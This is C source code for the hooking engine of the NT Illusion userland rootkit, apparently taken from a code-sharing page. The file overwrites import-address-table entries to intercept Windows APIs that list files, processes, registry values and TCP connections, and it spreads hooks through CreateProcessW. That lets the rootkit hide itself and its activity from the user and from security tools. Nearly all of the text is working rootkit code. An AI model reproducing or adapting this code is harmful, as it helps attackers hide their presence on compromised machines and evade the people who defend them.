📄 khijackeng.c
字号:
(*pFunc) = (FARPROC) funcGetProcAddress(GetModuleHandle(DllName), FuncName);
if((*pFunc))
{
if(ForgeHook((DWORD)(*pFunc), (DWORD)ReplacementFunc, (byte**)&CG_Func))
{
ret = 1;
(*pFunc) = (FARPROC) CG_Func;
}
}
return ret;
}
/*
SetUpHooks : This proc sets up hook for current process.
It performs checks in order not to rehook functions for a given dll.
This behaviour is designed for a call inside a MyLoadLibraryA/W/Ex function,
to hook functions of the new dll to load. (Flag==NTI_ON_NEW_DLL)
Nevertheless, if flag NTI_ON_ROOTKIT_LOAD is specified, these checks are disabled and all
functions are hooked for all Dlls
*/
void SetUpHooks(int Flag, char* Dll)
{
int result=0;
// Hook APIs, by Dlls, but only if dll isn't already loaded and NTI_ON_ROOTKIT_LOAD flag isn't
// set
if( (Flag!=NTI_ON_ROOTKIT_LOAD) && Dll)
OutputString("<!> Hooking '%s'...\n", Dll);
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "kernel32.dll"))) // dll name in LOWER CASE !!!
{
if(SPREAD_ACROSS_USERLAND)
{
// Place all hooks for kernel32.dll here
result = HookApi("kernel32.dll", "CreateProcessW", (DWORD)&MyCreateProcessW, &fCreateProcessW);
ShowResultOfHijack(result, "CreateProcessW", "!", (char*)"!");
}
result = HookApi("kernel32.dll", "GetProcAddress", (DWORD)&MyGetProcAddress, &fGetProcAddress);
ShowResultOfHijack(result, "GetProcAddress", "!", (char*)"!");
result = HookApi("kernel32.dll", "LoadLibraryA", (DWORD)&MyLoadLibrary, &fLoadLibrary);
ShowResultOfHijack(result, "LoadLibraryA", "!", (char*)"!");
result = HookApi("kernel32.dll", "FindFirstFileA", (DWORD)&MyFindFirstFileA, &fFindFirstFileA);
ShowResultOfHijack(result, "FindFirstFileA", "!", (char*)"!");
result = HookApi("kernel32.dll", "FindNextFileA", (DWORD)&MyFindNextFileA, &fFindNextFileA);
ShowResultOfHijack(result, "FindNextFileA", "!", (char*)"!");
result = HookApi("kernel32.dll", "FindFirstFileW", (DWORD)&MyFindFirstFileW, &fFindFirstFileW);
ShowResultOfHijack(result, "FindFirstFileW", "!", (char*)"!");
result = HookApi("kernel32.dll", "FindNextFileW", (DWORD)&MyFindNextFileW, &fFindNextFileW);
ShowResultOfHijack(result, "FindNextFileW", "!", (char*)"!");
result = HookApi("kernel32.dll", "DeviceIoControl", (DWORD)&MyDeviceIoControl, &fDeviceIoControl);
ShowResultOfHijack(result, "DeviceIoControl", "!", (char*)"!");
if( (!WriteFile_FPORT_ONLY) || (WriteFile_FPORT_ONLY && strstr(ExePath,(char*)NTILLUSION_TARGET_FPORT)!=0))
{
result = HookApi("kernel32.dll", "WriteFile", (DWORD)&MyWriteFile, &fWriteFile);
ShowResultOfHijack(result, "WriteFile", "!", (char*)"!");
}
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "user32.dll")))
{
result = HookApi("user32.dll", "CharToOemBuffA", (DWORD)&MyCharToOemBuff, &fCharToOemBuffA);
ShowResultOfHijack(result, "CharToOemBuffA", "!", (char*)"!");
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "ntdll.dll")))
{
result = HookApi("ntdll.dll", "NtQuerySystemInformation", (DWORD)&MyNtQuerySystemInformation, &fNtQuerySystemInformation);
ShowResultOfHijack(result, "NtQuerySystemInformation", "!", (char*)"!");
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "advapi32.dll")))
{
result = HookApi("advapi32.dll", "RegEnumValueW", (DWORD)&MyRegEnumValue, &fRegEnumValueW);
ShowResultOfHijack(result, "RegEnumValueW", "!", (char*)"!");
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "wsock32.dll")))
{
result = HookApi("wsock32.dll", "recv", (DWORD)&Myrecv, &frecv);
ShowResultOfHijack(result, "recv", "!", (char*)"!");
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "ws2_32.dll")))
{
result = HookApi("ws2_32.dll", "WSARecv", (DWORD)&MyWSARecv, &fWSARecv);
ShowResultOfHijack(result, "WSARecv", "!", (char*)"!");
}
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "iphlpapi.dll")))
{
result = HookApi("iphlpapi.dll", "GetTcpTable", (DWORD)&MyGetTcpTable, &fGetTcpTable);
ShowResultOfHijack(result, "GetTcpTable", "!", (char*)"!");
result = HookApi("iphlpapi.dll", "AllocateAndGetTcpExTableFromStack", (DWORD)&MyAllocateAndGetTcpExTableFromStack, &fAllocateAndGetTcpExTableFromStack);
ShowResultOfHijack(result, "AllocateAndGetTcpExTableFromStack", "!", (char*)"!");
}
/*
if(Flag==NTI_ON_ROOTKIT_LOAD || (Dll && strstr(Dll, "X.dll")))
{
result = HookApi("", "", (DWORD)&, &);
ShowResultOfHijack(result, "", "!", (char*)"!");
}
*/
}
// Perform HijackApiOfNewModule() for each module of the current process
int FixAllModules(char* ExePath)
{
DWORD pID = 0; //Process identifier, 0 for self
HANDLE hSnap;
MODULEENTRY32 mentry;
int bentry=1;
HINSTANCE hInstLib=0;
hInstLib = LoadLibrary("kernel32.dll");
if( hInstLib == NULL )
return 1;
// Resolve functions addresses using the true GetProcAddress (not already hijacked!)
fCreateToolhelp32Snapshot = (FARPROC) GetProcAddress(hInstLib,"CreateToolhelp32Snapshot");
nti_fModule32First = (FARPROC) GetProcAddress(hInstLib,"Module32First");
nti_fModule32Next = (FARPROC) GetProcAddress(hInstLib, "Module32Next");
if(!fCreateToolhelp32Snapshot || !nti_fModule32First || !nti_fModule32Next )
return 1;
hSnap = (HANDLE)(*fCreateToolhelp32Snapshot)(TH32CS_SNAPMODULE, pID);
mentry.dwSize=sizeof(MODULEENTRY32);
bentry = (*nti_fModule32First)(hSnap, &mentry);
if(!VERBOSE_HIJACK_RESULT) OutputString("[i] The result of the hijack won't be shown (VERBOSE_HIJACK_RESULT turned off)\n");
if(!VERBOSE_API_LIST) OutputString("[i] APIs of the process being hijacked won't be shown (VERBOSE_API_LIST turned off)\n");
//CheckAllImportedFunctionsForModule((DWORD)GetModuleHandle(NULL));
while(bentry)
{
my_strtolower((char*)(mentry.szModule));
if(!my_strcmp(((char*)(mentry.szModule)), (char*)kNTIDllName)){
//if(VERBOSE_API_LIST)
OutputString("\nSkipping our DLL...\n");
goto next;
}
if(VERBOSE_HIJACK_RESULT) OutputString("----------------------------------------[ %s ]\n", (char*)mentry.szModule);
HijackApiOfNewModule( (HMODULE)mentry.modBaseAddr, (char*)mentry.szModule, (char*)ExePath );
if(!my_strcmp(((char*)(mentry.szModule)), "kernel32.dll"))
{
OutputString("\nDumping IAT to debug explorer\n");
//DumpIATOfModule(((char*)(mentry.szModule)));
}
next:
mentry.dwSize=sizeof(MODULEENTRY32);
bentry= (*nti_fModule32Next)(hSnap,&mentry);
}
FreeLibrary(hInstLib);
CloseHandle(hSnap);
return 0;
}
// HijackApi : this function is used by NT Illusion to hijack calls to strategic APIs
// This source code is based on Oleg Kagan's sample "Example of interception of an API or any DLL function call
// (July 23, 1998)". I made the source simpler to understand.
// Kdm (kodmaker@netcourrier.com) 08/2002
int HijackApi(HMODULE hLocalModule, const char *DllName, const char *ApiName, PVOID pApiNew, PVOID *ApiOrg)
{
PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)hLocalModule;
PIMAGE_NT_HEADERS pNTHeader;
PIMAGE_IMPORT_DESCRIPTOR pImportDesc;
PIMAGE_THUNK_DATA pThunk; //define a pointer to IMAGE_THUNK_DATA (stores API address)
DWORD dwProtect=0, dwNewProtect=0;
int ret = 0;
//Get real API address in memory to be able to find it in IAT
DWORD dwAddressToIntercept = (DWORD)fGetProcAddress(GetModuleHandle((char*)DllName), (char*)ApiName);
//OutputString("%s/%s -> 0x%x\n", DllName, ApiName, dwAddressToIntercept);
if (pDOSHeader->e_magic != IMAGE_DOS_SIGNATURE) return 0;//Check signature of DOS header (0x5A4D/MZ)
pNTHeader = MakePtr(PIMAGE_NT_HEADERS, pDOSHeader, pDOSHeader->e_lfanew); //Set pointer to IMAGE_NT_HEADERS structure
if (pNTHeader->Signature != IMAGE_NT_SIGNATURE) return 0; //Check signature of NT header (0x00004550/PE00)
//Set pointer to IMAGE_IMPORT_DESCRIPTOR structure
pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, hLocalModule,
pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); //Build pointer to Import Table
//Walk Import Table
while (pImportDesc->Name) { //for each Dll (while name field isn't blank)
pThunk = MakePtr( PIMAGE_THUNK_DATA, hLocalModule, pImportDesc->FirstThunk); //set pointer to IAT for this Dll
//Walk IAT
while (pThunk->u1.Function) { //for each imported API :
//OutputString("-> 0x%x\n", ((DWORD)(pThunk->u1.Function)));
if (((DWORD)(pThunk->u1.Function)) == ((DWORD)(dwAddressToIntercept))) { //check if address matches or not
//It matches, so :
if (ApiOrg) *ApiOrg = (void*)(pThunk->u1.Function); //save genuine API address for later use
//Unlock read only memory protection
VirtualProtect((LPVOID)(&pThunk->u1.Function), sizeof(DWORD),PAGE_EXECUTE_READWRITE, &dwProtect);//unlock memory protection
(DWORD*)pThunk->u1.Function = (DWORD*)pApiNew; //OVERWRITE API address ! :)
//Restore previous memory protection
VirtualProtect((LPVOID)(&pThunk->u1.Function), sizeof(DWORD),dwNewProtect, &dwProtect);
ret = 1; //set success for return
}
pThunk++; //next API
}
pImportDesc++; //next dll.
}
return ret;
}
// Scan through IAT and patches target function entry point address
// It uses function name comparison instead of entry point address comparison
// because explorer handles oddly some API at load time
int HijackApiEx(HMODULE hLocalModule, const char *ntiDllName, const char *ntiApiName,
PVOID pApiNew, PVOID *ApiOrg)
{
PIMAGE_DOS_HEADER pDOSHeader;
PIMAGE_NT_HEADERS pNTHeaders;
PIMAGE_IMPORT_DESCRIPTOR pImportDesc;// Dll name chunk
PIMAGE_THUNK_DATA pIAT; // Functions address chunk
PIMAGE_THUNK_DATA pINT; // Functions names array
PIMAGE_IMPORT_BY_NAME pImportName; // Function Name
PIMAGE_THUNK_DATA pIteratingIAT;
char* DllName=NULL;
DWORD IAT_funcAddr=0; // fonction entry point in IAT
DWORD GPR_funcAddr=0; // function entry point with GetProcAddress
unsigned int cFuncs=0;
DWORD dwProtect=0, dwNewProtect=0;
int i=0, ret=0;
DWORD dwBase;
// Init
dwBase = (DWORD)hLocalModule;
pDOSHeader = (PIMAGE_DOS_HEADER) dwBase;
// Check dos header signature
if(pDOSHeader->e_magic != IMAGE_DOS_SIGNATURE)
return 0;
pNTHeaders = MakePtr(PIMAGE_NT_HEADERS, pDOSHeader, pDOSHeader->e_lfanew);
// Check NT header signature
if(pNTHeaders->Signature != IMAGE_NT_SIGNATURE)
return 0;
// Localize Import table
pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, dwBase, pNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
if(pImportDesc == (PIMAGE_IMPORT_DESCRIPTOR)pNTHeaders)
return 0;
// For each imported DLL
while(pImportDesc->Name)
{
DllName = MakePtr(char*, dwBase, pImportDesc->Name);
// check if it's the wanted dll
if(!_stricmp(ntiDllName, DllName))
{
// Set up Import Name/Address Table pointers for this dll
pINT = MakePtr(PIMAGE_THUNK_DATA, dwBase, pImportDesc->OriginalFirstThunk );
pIAT = MakePtr(PIMAGE_THUNK_DATA, dwBase, pImportDesc->FirstThunk );
cFuncs = 0;
// Count how many entries there are in this IAT. Array is 0 terminated
pIteratingIAT = pIAT;
while ( pIteratingIAT->u1.Function )
{
cFuncs++;
pIteratingIAT++;
}
if ( cFuncs != 0 )
{
// Scan through the IAT
pIteratingIAT = pIAT;
while ( pIteratingIAT->u1.Function )
{
// Check that function is imported by name
if ( !IMAGE_SNAP_BY_ORDINAL( pINT->u1.Ordinal ) )
{
pImportName = MakePtr(PIMAGE_IMPORT_BY_NAME, dwBase, pINT->u1.AddressOfData);
// Check if it's the target API
if(!_stricmp(ntiApiName, ((char*)pImportName->Name)))
{
// OK, this is the target API
// save genuine API address for later use
if (ApiOrg)
*ApiOrg = (void*)(pIteratingIAT->u1.Function);
//Unlock read only memory protection
VirtualProtect((LPVOID)(&pIteratingIAT->u1.Function), sizeof(DWORD),PAGE_EXECUTE_READWRITE, &dwProtect);
//OVERWRITE API address ! :)
(DWORD*)pIteratingIAT->u1.Function = (DWORD*)pApiNew;
//Restore previous memory protection
VirtualProtect((LPVOID)(&pIteratingIAT->u1.Function), sizeof(DWORD),dwProtect, &dwNewProtect);
return 1;
}
}
pIteratingIAT++; // jump to next IAT entry
pINT++; // jump to next INT entry
} // end for each function
} // end if there's functions in this IAT
} // end if it's the correct dll
pImportDesc++; // jump to next dll
} // end while (for each DLL)
return ret;
}
// This functions sends to Debugger (ie. DebugView) the information concerning the hijack of each API
void ShowResultOfHijack(int result, char* ApiName, char* ExePath, const char* ModuleName)
{
if(!VERBOSE_HIJACK_RESULT) return;
if(!result)
OutputString("[/] Cannot hijack %s in '%s'/'%s'\n", ApiName, (char*)ExePath, (char*)ModuleName);
else
OutputString("[o] %s HIJACKED in '%s'/'%s'\n", ApiName, (char*)ExePath, (char*)ModuleName);
return;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -